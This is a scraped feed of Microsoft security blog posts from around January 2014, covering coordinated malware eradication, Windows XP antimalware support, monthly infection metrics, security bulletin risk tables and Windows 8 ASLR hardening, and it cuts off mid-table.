and ISPs can block and take down deploy sites, and command and control servers.</li> <li><strong>Law enforcement:</strong> Using correlated evidence, law enforcement can prosecute the people and organizations behind the malware.</li> </ul> </div> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Group2a.png"><img class="ms-rtePosition-4" style="height:336px;width:600px;" alt="Antimalware ecosystem coordinated eradication" src="http://www.microsoft.com/security/portal/blog-images/a/Group2a.png" border="0" /></a></p> <p><em>Figure 2: The antimalware ecosystem&rsquo;s coordinated malware eradication</em></p> <p>The challenge is how we can all work together&nbsp;in a way that&rsquo;s efficient and long-lasting. Microsoft is committed to helping drive this industry effort&nbsp;forward. We are beginning by looking at what we can contribute to such a community, and we are asking our antimalware ecosystem partners to do the same.</p> <p>Several industry events are coming up this spring and summer. For example, RSA in San Francisco in February 2014, DCC in Singapore and&nbsp;the&nbsp;PCSL/IEEE Malware Conference in Beijing in March 2014, the May 2014 CARO Workshop in Florida, and the June 2014 FIRST event in Boston. These are great opportunities to hammer out a working framework for making coordinated malware eradication a reality. Microsoft will be hosting discussions at these events to do just that.<span class="ms-rteForeColor-2" style="color:#ff0000;">*</span></p> <p>I look forward to your feedback and on-going conversations about coordinated malware eradication.</p> <p><em>Dennis Batchelder</em><br /><em>MMPC&nbsp;</em></p> <p><em><span class="ms-rteForeColor-2" style="color:#ff0000;">* </span>To join the discussions at these events, please contact us at <a href="mailto:cme-invite@microsoft.com">cme-invite@microsoft.com</a>.</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3621530&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Microsoft antimalware support for Windows XPhttp://blogs.technet.com/b/mmpc/archive/2014/01/15/microsoft-antimalware-support-for-windows-xp.aspxWed, 15 Jan 2014 20:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:0e545d6d-d0d6-4f9c-839e-62196764acafmsft-mmpc17http://blogs.technet.com/b/mmpc/archive/2014/01/15/microsoft-antimalware-support-for-windows-xp.aspx#comments<div class="ExternalClassE3FCE4E09F5744C8AC952CE7B28FF10F"> <p>Microsoft has announced the Windows XP end of support date of April 8, 2014. After this date, Windows XP will no longer be a supported operating system<span style="color:#ff0000;">*</span>. To help organizations complete their migrations, Microsoft will continue to provide updates to our antimalware signatures and engine for Windows XP users through July 14, 2015.</p> <p>This does not affect the end-of-support date of Windows XP, or the supportability of Windows XP for other Microsoft products, which deliver and apply those signatures.</p> <p>For enterprise customers, this applies to System Center Endpoint Protection, Forefront Client Security, Forefront Endpoint Protection and Windows Intune running on Windows XP. For consumers, this applies to Microsoft Security Essentials.</p> <p>Our research shows that the effectiveness of antimalware solutions on out-of-support operating systems is limited. Running a well-protected solution starts with using modern software and hardware designed to help protect against today&rsquo;s threat landscape.</p> <p>Microsoft recommends best practices to protect your PC such as:</p> <ul> <li>Using modern software that has advanced security technologies and is supported with regular security updates</li> <li>Regularly applying security updates for all software installed</li> <li>Running up-to-date anti-virus software.</li> </ul> <p>Our goal is to provide great antimalware solutions for our consumer and business customers. We will continue to work with our customers and partners in doing so, and help our customers complete their migrations as Windows XP end of life approaches.</p> <p><strong><i>MMPC</i></strong></p> <p><i><span style="color:#ff0000;">* </span>We&#39;ve received some inquiries about what &quot;no longer supported operating system&quot; means. To clarify, this mean that, after April 8, 2014, Windows XP users will no longer receive new security updates, non-security hotfixes, free or paid assisted support options, or online technical content updates from Microsoft.</i></p> <p><em>February 5, 2014: We&rsquo;ve received several inquiries about the difference between security updates and antimalware signatures, as well as the Malicious Software Removal Tool (MSRT) for Windows XP. You can find answers to these questions and more on our <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download?os=winxp&amp;arch=other">Windows XP end of support</a> page.</em></p> <p><i>&nbsp;</i></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3620483&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Protection metrics – December resultshttp://blogs.technet.com/b/mmpc/archive/2014/01/14/protection-metrics-december-results.aspxWed, 15 Jan 2014 00:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e957b271-8884-4288-beed-a40ffa3fd395msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/01/14/protection-metrics-december-results.aspx#comments<div class="ExternalClass5E4213CAA98A4E27832435EA2E5474C8"> <p>Happy New Year! December 2013 was an exciting month for monitoring <a href="http://www.microsoft.com/security/portal/mmpc/shared/protection.aspx">our protection results</a> and watching malware trends. The good news - our customer infection rate for December (0.06 percent) was lower than any other month in 2013 and one third the size of our peak in <a href="http://blogs.technet.com/b/mmpc/archive/2013/11/26/our-protection-metrics-october-results.aspx">October</a>. The <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Sefnit">Win32/Sefnit</a> trio mentioned in the October and <a href="http://blogs.technet.com/b/mmpc/archive/2013/12/23/protection-metrics-november-results.aspx">November</a> 2013 results declined even more significantly than last month. Even better, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Sirefef">Win32/Sirefef</a> malware development appears to have stopped after <a href="http://blogs.technet.com/b/microsoft_blog/archive/2013/12/19/zeroaccess-criminals-wave-white-flag-the-impact-of-partnerships-on-cybercrime.aspx">the disruption effort</a> led by the Microsoft Digital Crimes Unit. <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Wysotot">Win32/Wysotot</a> also suffered significant declines. More on these families in the year in review section below.</p> <p>As for our other protection metrics, our performance metrics were consistent, and although incorrect detections remained low, we picked up one more crafted file attack. This was a specially-crafted clean file designed to trick antimalware vendors into incorrectly detecting a good program as malicious. This file raised our impact to 0.001 percent (or one in 100,000 in comparison to normal months where the impact closer to 1 in a 1,000,000). Along with improving our own processes to thwart these attack attempts on our systems, Dennis Batchelder and Hong Jia gave a <a href="http://www.virusbtn.com/conference/vb2013/abstracts/LM7-JiaBatchelder.xml">presentation on this attack technique at VirusBulletin</a> to help other vendors (from our data, we could see that there were several vendors who also appeared to be targets) discover and prevent these attacks from affecting customers.</p> <p><strong>Malware infections - Year in review</strong></p> <p>December 2013 was a good end to a tumultuous year. Figure 1 shows that although in this last quarter, our infection rates rose primarily due to the Sefnit trio, our overall rates ended on a good note with the decline of many malware families. Although fighting malware can often feel like whack-a-mole, seeing major families disappear into oblivion and the overall malware infection rate decline feels like a win in our industry.</p> <p>Figure 2 highlights several major families that, earlier in the year, were contributing significantly to infections affecting Microsoft customers in addition to the overall infection rate (also shown on our <a href="http://www.microsoft.com/security/portal/mmpc/shared/protection-prev.aspx">protection metrics trend page</a>.)</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Decmet1.png"><img style="width:500px;" alt="2013 average infection rates" src="http://www.microsoft.com/security/portal/blog-images/a/Decmet1.png" border="0" /></a></p> <p><em>Figure 1: 2013 average daily infection rates</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Decmet2.png"><img style="width:500px;" alt="Malware family contributions to infections - 2013" src="http://www.microsoft.com/security/portal/blog-images/a/Decmet2.png" border="0" /></a></p> <p><em>Figure 2: 2013 malware infections by family</em></p> <p>First, I&#39;ll talk about <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/FakeRean">FakeRean</a>. This family poses as fake security software, which, as a category, took a dive in 2013 as we reported in the last Security Intelligence Report (<a href="http://www.microsoft.com/security/sir/default.aspx">SIRv15</a>). FakeRean practically disappeared by July 2013.</p> <p>Next, the Sefnit trio. Sefnit, a family that has been around for some time, made a strong comeback in 2013 and was given a strong assist by several trojans (<a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Rotbrow">Rotbrow</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Brantall">Brantall</a>) used to distribute it. We took the fight to several fronts. One of the methods of distribution for Sefnit is through Tor. <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/09/tackling-the-sefnit-botnet-tor-hazard.aspx">We worked with the Tor project</a> to clean up the clients that were installed by Sefnit, preventing further abuse. We also took out the new distributors &ndash; Rotbrow and Brantall &ndash; reaching out to our MVI and VIA partners to ensure they also detected them. By December 2013, all three were in significant decline, and Sefnit impact is down to a trickle in comparison to the surge we saw in September and October 2013.</p> <p>Wysotot, a new family that emerged late in 2013, hit a few highs in October and November, but slowed per our telemetry in December.</p> <p>Last but not least, Sirefef. This family starting becoming very prevalent in 2012. Originally focusing on clickfraud and employing techniques making it really difficult to remove once installed, this threat quickly became a concern. In 2013, we started collaborating with the Digital Crimes Unit to apply some novel disruption techniques to squeeze this malware family out of existence. As figures 2 and 3 show, it worked. The malware authors even responded with a somewhat humorous &quot;white flag&quot; in their code and appear to have stopped development in their family altogether.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Decmet3.png"><img style="width:500px;" alt="Sirefef encounter rates" src="http://www.microsoft.com/security/portal/blog-images/a/Decmet3.png" border="0" /></a></p> <p><em>Figure 3: Sirefef encounters for Microsoft real-time protection customers</em></p> <p>Of course these families could make a comeback. We&#39;ll be here waiting for them when they try.</p> <p><em>Holly Stewart</em></p> <p><em>MMPC</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3620553&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Assessing risk for the January 2014 security updates http://blogs.technet.com/b/srd/archive/2014/01/14/assessing-risk-for-the-january-2014-security-updates.aspxTue, 14 Jan 2014 16:56:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:0f25b526-0f45-420d-b246-92aa98c84246SRD Blog Author0<p>Today we released four security bulletins addressing six CVE&rsquo;s. All four bulletins have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><b>Bulletin</b></td> <td><b>Most likely attack vector</b></td> <td><b>Max Bulletin Severity</b></td> <td><b>Max exploit-ability rating</b></td> <td><b>Likely first 30 days impact</b></td> <td><b>Platform mitigations and key notes</b></td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-002">MS14-002</a> <p>(NDProxy, a kernel-mode driver)</p> </td> <td>Attacker able to run code at a low privilege level inside an application sandbox exploits this vulnerability to elevate privileges to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to continue seeing Adobe PDF exploits leveraging this vulnerability to elevate privileges outside sandbox.</td> <td>All exploits we have analyzed for this vulnerability attempt to exploit an already-patched Adobe Reader vulnerability, CVE-2013-3346. This Adobe vulnerability was addressed via a September 11, 2013 Adobe security update. <p>Addresses vulnerability described by security advisory 2914486.</p> </td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-001">MS14-001</a> <p>(Word)</p> </td> <td>Victim opens malicious Office document.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-003">MS14-003</a> <p>(win32k.sys, a kernel-mode driver)</p> </td> <td>Attacker running code at low privilege runs exploit binary to elevate to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-004">MS14-004</a> <p>(Microsoft Dynamics AX)</p> </td> <td>Attacker able to authenticate to Dynamics server could cause denial-of-service condition preventing it from servicing other client requests.</td> <td>Important</td> <td>n/a</td> <td>Denial of service only, not usable for code execution.</td> <td>&nbsp;</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC engineering</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3620481&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">Risk Asessmentrating Software defense: mitigating common exploitation techniqueshttp://blogs.technet.com/b/srd/archive/2013/12/11/software-defense-mitigating-common-exploitation-techniques.aspxThu, 12 Dec 2013 00:04:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:93962483-8422-45bb-8ef1-252fe982a260swiat0<p><span style="font-family: Calibri; font-size: small;">In our previous posts in this series, we described various mitigation improvements that attempt to prevent the exploitation of specific classes of memory safety vulnerabilities such as those that involve </span><a href="http://blogs.technet.com/b/srd/archive/2013/10/02/software-defense-mitigating-stack-corruption-vulnerabilties.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">stack corruption</span></a><span style="font-family: Calibri; font-size: small;">, </span><a href="http://blogs.technet.com/b/srd/archive/2013/10/29/software-defense-mitigation-heap-corruption-vulnerabilities.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">heap corruption</span></a><span style="font-family: Calibri; font-size: small;">, and </span><a href="http://blogs.technet.com/b/srd/archive/2013/11/06/software-defense-safe-unlinking-and-reference-count-hardening.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">unsafe list management and reference count mismanagement</span></a><span style="font-size: small;"><span style="font-family: Calibri;">. These mitigations are typically associated with a specific developer mistake such as writing beyond the bounds of a stack or heap buffer, failing to correctly track reference counts, and so on. As a result, these mitigations generally attempt to detect side-effects of such mistakes before an attacker can get further along in the exploitation process, e.g. before they gain control of the instruction pointer. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Another approach to mitigating exploitation is to focus on breaking techniques that can apply to many different classes of memory safety vulnerabilities. These mitigations can have a broader impact because they apply to techniques that are used further along in the process of exploiting many vulnerabilities. For example, once an attacker has gained control of the instruction pointer through an arbitrary vulnerability, they will inherently need to know the address of useful executable code to set it to. This is where well-known mitigations like Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) come into play &ndash; both of which have been supported on Windows for many releases now. When combined, these mitigations have proven that they can make it very difficult to exploit many classes of memory safety vulnerabilities even when an attacker has gained control of the instruction pointer.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">In recent years, attackers have been increasingly forced to adapt to exploiting vulnerabilities in applications that make use of a broad range of mitigations, including DEP and ASLR. As our </span><a href="http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">previous blog post explains</span></a><span style="font-size: small;"><span style="font-family: Calibri;">, there are scenarios where both DEP and ASLR can be bypassed, and it is no surprise that attackers have been increasingly focused on improving their ability to do so. Likewise, attackers have placed greater interest on finding classes of vulnerabilities, such as use after free issues, that can grant them more flexibility when attempting to develop an exploit. In light of these trends, we focused a significant amount of attention in Windows 8 and Windows 8.1 on improving the robustness of mitigations that break exploitation techniques that apply to many classes of vulnerabilities. In particular, this blog post will cover some of the noteworthy improvements that have been made to ASLR, such as eliminating predictable address space mappings, increasing the amount of entropy that exists in the address space, and making it more difficult to disclose address space information where possible.</span></span></p> <h1><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Force ASLR</span></span></h1> <p><span style="font-family: Calibri; font-size: small;">For compatibility reasons, executable images (DLLs/EXEs) must indicate their desire to be randomized by ASLR through the </span><a href="http://msdn.microsoft.com/en-us/library/bb384887.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">/DYNAMICBASE flag</span></a><span style="font-family: Calibri; font-size: small;"> provided by the Visual C++ linker.&nbsp; If an executable image has not been linked with /DYNAMICBASE, the Windows kernel will attempt to load the image at its preferred base address.&nbsp; This can cause the executable to reliably load at a predictable location in memory.&nbsp; While this limitation of ASLR on Windows is by design, real-world exploits for software vulnerabilities have become </span><a href="http://www.microsoft.com/en-us/download/details.aspx?id=39680"><span style="color: #0563c1; font-family: Calibri; font-size: small;">increasingly reliant</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> on executable images that have not enabled support for ASLR.&nbsp; </span></span></p> <p><span style="font-family: Calibri; font-size: small;">To generically mitigate this issue, an application running on Windows 8 (or Windows 7 with </span><a href="http://support.microsoft.com/kb/2639308"><span style="color: #0563c1; font-family: Calibri; font-size: small;">KB 2639308</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> installed) can elect to enable a security feature known as <em>Force ASLR</em>.&nbsp; When enabled, this feature forces all relocatable images to be randomized when they are loaded by the application, including those images which have not been linked with /DYNAMICBASE.&nbsp; This is designed to prevent executable images from being loaded at a predictable location in memory.&nbsp; If desired, an application can also elect to prevent non-relocatable images from being loaded.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Since the Force ASLR feature will cause executable images to be randomized that have not enabled support for ASLR, there is a risk that a compatibility problem may be encountered.&nbsp; In addition, the method used to forcibly relocate executable images that have not been built with /DYNAMICBASE can have a performance impact due to decreased page sharing. This is because Force ASLR essentially mimics the behavior of a base address collision and thus may incur a memory cost due to copy-on-write. As such, the Force ASLR feature is not enabled by default for applications running on Windows 8.&nbsp; Instead, applications must explicitly enable this feature.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">The Force ASLR feature has been enabled by default for critical applications such as Internet Explorer 10+, Microsoft Office 2013, and Windows Store applications.&nbsp; This means an attacker attempting to exploit vulnerabilities accessible through these applications will not be able to rely on non-randomized executable images. For example, our </span><a href="http://blogs.technet.com/b/srd/archive/2013/12/09/ms13-106-another-aslr-bypass-is-gone.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">recent security update to enable ASLR for HXDS.DLL</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> would not appreciably impact the security posture of applications that enable Force ASLR because this non-ASLR DLL would already get randomized. Going forward, attackers will most likely need to rely on a vulnerability-specific address space information disclosure when exploiting applications that completely enable ASLR or that make use of Force ASLR. </span></span></p> <h1><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Bottom-up and Top-down Randomization</span></span></h1> <p><span style="font-size: small;"><span style="font-family: Calibri;">Virtual memory allocations that are made by an application can have their base address assigned in one of three ways: bottom-up, top-down, or based.&nbsp; The bottom-up method searches for a free region starting from the bottom of the address space (e.g. VirtualAlloc default), the top-down method searches starting from the top of the address space (e.g. VirtualAlloc with MEM_TOP_DOWN), and the based method attempts to allocate memory at a supplied base address (e.g. VirtualAlloc with an explicit base).&nbsp; In practice, the majority of the memory that is allocated by an application will use the bottom-up allocation method, and it is rare to see applications use the based method for allocating memory.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Prior to Windows 8, bottom-up and top-down allocations were not randomized by ASLR.&nbsp; This meant that allocations made through functions like VirtualAlloc and MapViewOfFile had no entropy and could therefore be placed at a predictable location in memory (barring non-deterministic application behavior).&nbsp; While certain memory regions had their own base randomization, such as heaps, stacks, TEBs, and PEBs, all other bottom-up and top-down allocations were not randomized.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Starting with Windows 8, the base address of all bottom-up and top-down allocations is explicitly randomized.&nbsp; This is accomplished by randomizing the address that bottom-up and top-down allocations start from for a given process.&nbsp; In this way, fragmentation within the address space is minimized while also realizing the benefits of randomizing the base address of all memory allocations that are not explicitly based.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">For compatibility reasons, applications must indicate that they support bottom-up and top-down randomization.&nbsp; An application can do this by linking their EXE with /DYNAMICBASE.</span></span></p> <h1><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">High Entropy Randomization</span></span></h1> <p><span style="font-size: small;"><span style="font-family: Calibri;">One of the major differences between 64-bit and 32-bit applications on Windows is the size of the virtual address space that is made available to a process.&nbsp; 64-bit applications whose EXE is linked with the /LARGEADDRESSAWARE flag receive 8 TB in Windows 8 (128 TB in Windows 8.1) of virtual address space whereas 32-bit applications only receive 2 GB by default.&nbsp; The limited amount of address space available to 32-bit applications places practical constraints on the amount of entropy that can be applied by ASLR when randomizing the location of memory mappings.&nbsp; Since 64-bit applications do not suffer from these limitations by default, it is possible to significantly increase the amount of entropy that is used by ASLR.&nbsp; The ASLR implementation in Windows 8 takes full advantage of this opportunity by enabling high degrees of entropy for 64-bit applications.&nbsp; Providing higher degrees of entropy can further decrease the reliability of exploits written by an attacker and also makes it less likely that an attacker will be able to correctly guess or brute force an address.</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">High Entropy Bottom-up Randomization</span></span></span></h2> <p><span style="font-size: small;"><span style="font-family: Calibri;">This feature introduces 1 TB of variance into the address that bottom-up allocations start from.&nbsp; This equates to 24 bits of entropy, or a 1 in 16,777,216 chance of guessing the start address correctly.&nbsp; Since heaps, stacks, and most other memory regions are allocated bottom-up, this has the effect of making traditional address space spraying attacks impractical (such as heap and JIT spraying).&nbsp; This is because systems today do not have enough memory available to spray the amount that would be needed to achieve even small degrees of reliability.&nbsp; In addition, executable images that are randomized by the Force ASLR feature receive high degrees of entropy as a result of the high entropy bottom-up randomization feature being enabled for an application. As a result, exploits for vulnerabilities in 64-bit applications that rely on address space spraying will first need to disclose the address at least one bottom-up allocation in order to determine where data may have been placed relative to that address.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">For compatibility reasons, this feature is disabled by default and must be enabled on a per-application basis.&nbsp; This is because some 64-bit applications have latent pointer truncation issues that can surface when dealing with pointers above 4 GB (significant bits set beyond bit 31).&nbsp; 64-bit applications that enable this feature are guaranteed to receive memory addresses that are above 4 GB when allocating bottom-up memory (unless insufficient address space exists above 4 GB).&nbsp; 64-bit applications can enable support for this feature by linking their EXE with the </span><a href="http://msdn.microsoft.com/en-us/library/vstudio/jj835761.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">/HIGHENTROPYVA linker flag</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> provided by Visual Studio 2012. This flag is enabled by default for native applications when building with Visual Studio 2012 and beyond.</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">High Entropy Top-down Randomization</span></span></span></h2> <p><span style="font-size: small;"><span style="font-family: Calibri;">This feature introduces 8 GB of variance into the address that top-down allocations start from.&nbsp; This equates to 17 bits of entropy, or a 1 in 131,072 chance of guessing the start address correctly.&nbsp; 64-bit processes automatically receive high degrees of entropy for top-down allocations if top-down randomization has been enabled (which is controlled by whether the EXE linked with /DYNAMICBASE).&nbsp; &nbsp;</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">High Entropy Image Randomization</span></span></span></h2> <p><span style="font-family: Calibri;"><span style="font-size: small;">Prior to Windows 8, 64-bit executable images received the same amount of entropy that was used when randomizing 32-bit executable images (8 bits, or 1 in 256 chance of guessing correctly).&nbsp; The amount of entropy applied to 64-bit images has been significantly increased in most cases starting with Windows 8:</span></span></p> <ul> <li><span style="font-family: Calibri;"><span style="font-size: small;">DLL images based above 4 GB: 19 bits of entropy (1 in 524,288 chance of guessing correctly)</span></span></li> <li><span style="font-family: Calibri;"><span style="font-size: small;">DLL images based below 4 GB: 14 bits of entropy (1 in 16,384 chance of guessing correctly).&nbsp; </span></span></li> <li><span style="font-family: Calibri;"><span style="font-size: small;">EXE images based above 4 GB: 17 bits of entropy (1 in 131,072 chance of guessing correctly).</span></span></li> <li><span style="font-size: small;"><span style="font-family: Calibri;">EXE images based below 4 GB: 8 bits of entropy (1 in 256 chance of guessing correctly).</span></span></li> </ul> <p><span style="font-size: small;"><span style="font-family: Calibri;">The reason that entropy differences exist due to the base address of an image is again for compatibility reasons.&nbsp; The Windows kernel currently uses the preferred base address of an image as a hint to decide if the image supports being based above 4 GB.&nbsp; Images that are based below 4 GB may not have been tested in scenarios where they are relocated above 4 GB and therefore may have latent pointer truncation issues.&nbsp; As such, the Windows kernel makes a best-effort attempt to ensure that these images load below 4 GB.&nbsp; Because of these constraints, the vast majority of 64-bit EXEs and DLLs in Windows 8 and Windows 8.1 have been based above 4 GB to ensure that they benefit from the highest possible degrees of entropy. 64-bit images produced by the Visual C++ tool chain also base images above 4 GB by default.</span></span></p> <h1><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Address Space Information Disclosure Hardening</span></span></h1> <p><span style="font-size: small;"><span style="font-family: Calibri;">The effectiveness of ASLR is inherently dependent on an attacker being unable to discover the location of objects in memory.&nbsp; In some cases, an attacker can leverage a vulnerability in a program to disclose information about the address space layout of a process.&nbsp; For example, an attacker could use a vulnerability to read memory that they would not normally be able to access and thereby discover the address of a DLL in memory.&nbsp; While the mechanics of disclosing address space information are typically dependent on the application and vulnerability that are being exploited, there are some general approaches that attackers have identified.&nbsp; In Windows 8, we have taken steps to eliminate and destabilize known address space information disclosure vectors, although these changes have by no means resolved the general problem posed by address space information disclosures.</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Image pointers removed from SharedUserData</span></span></span></h2> <p><span style="font-family: Calibri; font-size: small;">Windows uses an internal data structure known as SharedUserData to efficiently communicate certain pieces of information from the kernel to all processes on a system.&nbsp; For efficiency and compatibility reasons, the memory address that SharedUserData is located at is consistent across all processes on a system and across all versions of Windows, including Windows 8 (0x7ffe0000).&nbsp; Since Windows XP Service Pack 2, this memory region has contained pointers into a system DLL (NTDLL.DLL) that have been used to enable efficient system call invocation, among other things.&nbsp; The presence of image pointers at a known-fixed location in memory was noted as being useful in the context of certain types of address space information disclosures.&nbsp; In Windows 8 (and now prior versions with MS13-063 installed), all image pointers have been removed from SharedUserData to mitigate this type of attack. The removal of these pointers effectively mitigated a DEP/ASLR bypass that was later disclosed which affected versions of Windows prior to Windows 8 (involving </span><a href="http://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">LdrHotPatchRoutine</span></a><span style="font-size: small;"><span style="font-family: Calibri;">). </span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Predictable fixed memory mappings eliminated</span></span></span></h2> <p><span style="font-size: small;"><span style="font-family: Calibri;">Ensuring that all forms of memory allocation have some base level of entropy has the effect of eliminating what would otherwise be predictable memory mappings in the address space. In some cases, an attacker may be able to leverage a vulnerability to read the contents of arbitrary locations in memory. In these cases, the attacker must be able to predict or discover the address of the object that they wish to read from (typically via heap spraying). The improvements that have been made to ASLR in Windows 8 have made it more difficult for attackers to do this reliably, particularly on 64-bit. As a result, any address space information disclosure that relies on reading from a specified location in memory will generally be more difficult and less reliable on Windows 8. It should be noted, however, that the size of the 32-bit address space places practical constraints on the impact of this, particularly in cases where an attacker is able to fill a large portion of the address space with desired content.</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Kernel address space information access restrictions</span></span></span></h2> <p><span style="font-size: small;"><span style="font-family: Calibri;">While the previous sections highlighted improvements that were made to ASLR for user mode applications, we also made investments in Windows 8.1 into hardening the Windows kernel against disclosing kernel address space information to lesser privileged user mode processes. The majority of these improvements focused on restricting low integrity processes from accessing certain system and process information classes that intentionally expose kernel address space information. In addition, certain kernel addresses were removed from the shared desktop heap and hypervisor-assisted restrictions were added to limit the exposure of kernel addresses via instructions that can be used to query the GDT/IDT descriptor table base addresses. As a result of these improvements, sandboxed applications such as Internet Explorer 11, Microsoft Office 2013, and Windows Store apps are all prevented from discovering addresses through these interfaces. This means it will be more difficult for attackers to exploit local kernel vulnerabilities as a means of escaping these sandboxes.</span></span></p> <h1><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Conclusion</span></span></h1> <p><span style="font-size: small;"><span style="font-family: Calibri;">The improvements that have been made to ASLR in Windows 8 and Windows 8.1 have addressed various limitations that attackers have been taking advantage when exploiting vulnerabilities. As a result of these improvements, we anticipate that attackers will continue to be increasingly reliant on address space information disclosures as a means of bypassing ASLR. Forcing attackers to rely on information disclosures has the effect of adding another costly check box to the conditions that attackers need to satisfy when exploiting memory safety vulnerabilities in modern applications.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">- Matt Miller</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3617869&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">Defense-in-depthmitigationexploitationASLR Assessing risk for the December 2013 security updates http://blogs.technet.com/b/srd/archive/2013/12/10/assessing-risk-for-the-december-2013-security-updates.aspxTue, 10 Dec 2013 18:03:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:d4e0026f-727f-49ef-bb6e-6fc3060241deswiat0<p>Today we released eleven security bulletins addressing 24 CVE&rsquo;s. Five bulletins have a maximum severity rating of Critical while the other six have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table style="width: 350px;" border="1"> <tbody> <tr> <td>Bulletin</td> <td>Most likely attack vector</td> <td>Max Bulletin Severity</td> <td>Max XI</td> <td>Likely first 30 days impact</td> <td>Platform mitigations and key notes</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-096">MS13-096</a> <p>(GDI+ TIFF parsing)</p> </td> <td>Victim opens malicious Office document.</td> <td>Critical</td> <td>1</td> <td>Likely to continue seeing Office document attacks leveraging CVE-2013-3906.</td> <td>Addresses vulnerability first described in <a href="https://support.microsoft.com/kb/2896666">Security Advisory 2896666</a>. More information about these attacks described in<a href="http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx"> this SRD blog post</a> from November.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-097">MS13-097</a></p> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Address five remote code execution and two elevation of privilege vulnerabilities. The elevation of privilege vulnerabilities could be used by an attacker to elevate out of Internet Explorer&rsquo;s Protected Mode after already achieving code execution within that 